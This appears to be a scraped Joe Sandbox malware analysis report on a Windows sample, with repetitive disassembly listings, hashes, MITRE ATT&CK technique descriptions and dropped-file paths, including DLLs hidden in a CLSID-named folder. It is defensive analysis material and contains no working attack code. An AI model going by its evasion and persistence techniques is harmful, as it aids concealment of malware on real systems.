fs_file_read, xrefs: 00007FFDA55A2635
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFDA55A263C

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 8eb4d870f238e91f2d5bbe58b9af2a3275b9deecab1f762123ce48531f5c5a8b
Instruction ID: db6111d73d45f4a05f8cc49f29a9dfd6fa3718b85754c939dc64be8175e472f8
Opcode Fuzzy Hash: 8eb4d870f238e91f2d5bbe58b9af2a3275b9deecab1f762123ce48531f5c5a8b
Instruction Fuzzy Hash: 48F05E2BF0B60B41F9579E04B57A7B911412F86F75E0A4931EE5C0B7C3FE3EA8829204

Function 00007FFDA55A222D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFDA55A2600

Strings

fs_file_read, xrefs: 00007FFDA55A2635
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFDA55A263C

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: d010a90561573719fc9f399b6f534464e5a497c6d7c0cb02a75a670e949dce2c
Instruction ID: 521929faa17a5b5059da9ff2eee7dcdb827749491eb5bd5a7bfbbef145ba3abc
Opcode Fuzzy Hash: d010a90561573719fc9f399b6f534464e5a497c6d7c0cb02a75a670e949dce2c
Instruction Fuzzy Hash: 8EF05E2BF0B60B41F9579E04B56A7B911412F86F75E0A4931EE5C0B7C3EE3EA8829204

Function 00007FFDA55A25E5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFDA55A2600

Strings

fs_file_read, xrefs: 00007FFDA55A2635
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFDA55A263C

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: c691da6f1b1194fdf2f0cfeebaca440441ea7bc60bc50dcfac5fac074da65bcc
Instruction ID: 0a55cafa0148c5280e46e6d16e886a669c07be01ce493cfec983ca9989764d1e
Opcode Fuzzy Hash: c691da6f1b1194fdf2f0cfeebaca440441ea7bc60bc50dcfac5fac074da65bcc
Instruction Fuzzy Hash: E8F0542BF0B60B41F9575E0475767B911412F86F75E0A4931DE5C0B7C3EE3E69829204

Function 00007FFDA55A25EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFDA55A2600

Strings

fs_file_read, xrefs: 00007FFDA55A2635
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFDA55A263C

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: c691da6f1b1194fdf2f0cfeebaca440441ea7bc60bc50dcfac5fac074da65bcc
Instruction ID: 0a55cafa0148c5280e46e6d16e886a669c07be01ce493cfec983ca9989764d1e
Opcode Fuzzy Hash: c691da6f1b1194fdf2f0cfeebaca440441ea7bc60bc50dcfac5fac074da65bcc
Instruction Fuzzy Hash: E8F0542BF0B60B41F9575E0475767B911412F86F75E0A4931DE5C0B7C3EE3E69829204

Function 00007FFDA55A25DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FFDA55A2600

Strings

fs_file_read, xrefs: 00007FFDA55A2635
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FFDA55A263C

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: c691da6f1b1194fdf2f0cfeebaca440441ea7bc60bc50dcfac5fac074da65bcc
Instruction ID: 0a55cafa0148c5280e46e6d16e886a669c07be01ce493cfec983ca9989764d1e
Opcode Fuzzy Hash: c691da6f1b1194fdf2f0cfeebaca440441ea7bc60bc50dcfac5fac074da65bcc
Instruction Fuzzy Hash: E8F0542BF0B60B41F9575E0475767B911412F86F75E0A4931DE5C0B7C3EE3E69829204

Function 00007FFDA55A80D9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32 ref: 00007FFDA55A810C

Strings

scm_start, xrefs: 00007FFDA55A7F33
[E] (%s) -> Service start failed(lpServiceName=%s,err=%08x), xrefs: 00007FFDA55A7F3A

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: CloseHandleService
String ID: [E] (%s) -> Service start failed(lpServiceName=%s,err=%08x)$scm_start
API String ID: 1725840886-2678404757
Opcode ID: f2649a03ea3f254dd46eb44c8de08af177a9093a2dd4d362b51a28281288e1b6
Instruction ID: 00203a8b51b6e3e1f7b29a310766c49d36883c086dcba2496d3178575bd22050
Opcode Fuzzy Hash: f2649a03ea3f254dd46eb44c8de08af177a9093a2dd4d362b51a28281288e1b6
Instruction Fuzzy Hash: F5F0622AF0E51F42EA275F10A97877812505F03FA4F050534CE4E177D3AD1EA9418388

Function 00007FFDA55A80D2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32 ref: 00007FFDA55A810C

Strings

scm_start, xrefs: 00007FFDA55A7F33
[E] (%s) -> Service start failed(lpServiceName=%s,err=%08x), xrefs: 00007FFDA55A7F3A

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: CloseHandleService
String ID: [E] (%s) -> Service start failed(lpServiceName=%s,err=%08x)$scm_start
API String ID: 1725840886-2678404757
Opcode ID: ec4a6679ca904e2c1d0a30445f8a4b53f34b5ef772b44e5321c9d714ca2afa08
Instruction ID: 17a8b8727d2055b265c1b25e263c13dcd9675e3ceafa74d75f2e069256cdb8f5
Opcode Fuzzy Hash: ec4a6679ca904e2c1d0a30445f8a4b53f34b5ef772b44e5321c9d714ca2afa08
Instruction Fuzzy Hash: 6DF0622AF0E51B42EA275F10A97877812505F03FA4F050535CE4E177D39D1EA9418389

Function 00007FFDA55A58A6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFDA55A58B7

Part of subcall function 00007FFDA55AC852: fwrite.MSVCRT ref: 00007FFDA55AC8FE
Part of subcall function 00007FFDA55AC852: fflush.MSVCRT ref: 00007FFDA55AC90A

Strings

[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFDA55A58D7
registry_del_value, xrefs: 00007FFDA55A58D0

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 1001908780-1337547089
Opcode ID: bc2321b1d27681ef0364b07b9caca71acd9c5b260bdf5c410d6b27a1f371dacf
Instruction ID: ae8ff9bef59bb0d5dba2762e7ed042920e10908f2ff857bf54235a7bf781174e
Opcode Fuzzy Hash: bc2321b1d27681ef0364b07b9caca71acd9c5b260bdf5c410d6b27a1f371dacf
Instruction Fuzzy Hash: 69E09269B0E60E81ED135F40F8646796214FB52FC4F440035EB0E427929E2CE6899208

Function 00007FFDA55A7607 Relevance: 5.0, APIs: 4, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFDA55A763D
HeapFree.KERNEL32 ref: 00007FFDA55A764E
GetProcessHeap.KERNEL32 ref: 00007FFDA55A7662
HeapFree.KERNEL32 ref: 00007FFDA55A7673

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 52071573abfc37b688244c61e326d04804cb9da7333af29a775557c74bcfae91
Instruction ID: eb7c0b3040e1bb08fa11f64b2cdfa0e10bcf2362a47a6763c7b3dbdde3221ed5
Opcode Fuzzy Hash: 52071573abfc37b688244c61e326d04804cb9da7333af29a775557c74bcfae91
Instruction Fuzzy Hash: F2012C69B1B60A91FE524F14E43837522E0AF8AF91F490834CA0D033E2EF3DA5448618

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
Tactics:	Credential Access, Discovery
Data Sources:	Command: Command Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_main.exe_59e5c191145a7e657df69e5cbadfff4911e783_61e28721_693df407-71e9-4305-94b4-25c12824397b\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_main.exe_59e5c191145a7e657df69e5cbadfff4911e783_61e28721_8343aa60-c28b-40a9-9100-7a5ae7dee24a\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7516.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER75C2.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER75E3.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7602.tmp.csv

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7680.tmp.txt

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE49D.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE625.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE664.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE672.tmp.csv

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE78C.tmp.txt

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\config.ini

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log

Windows Analysis Report
file.exe

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
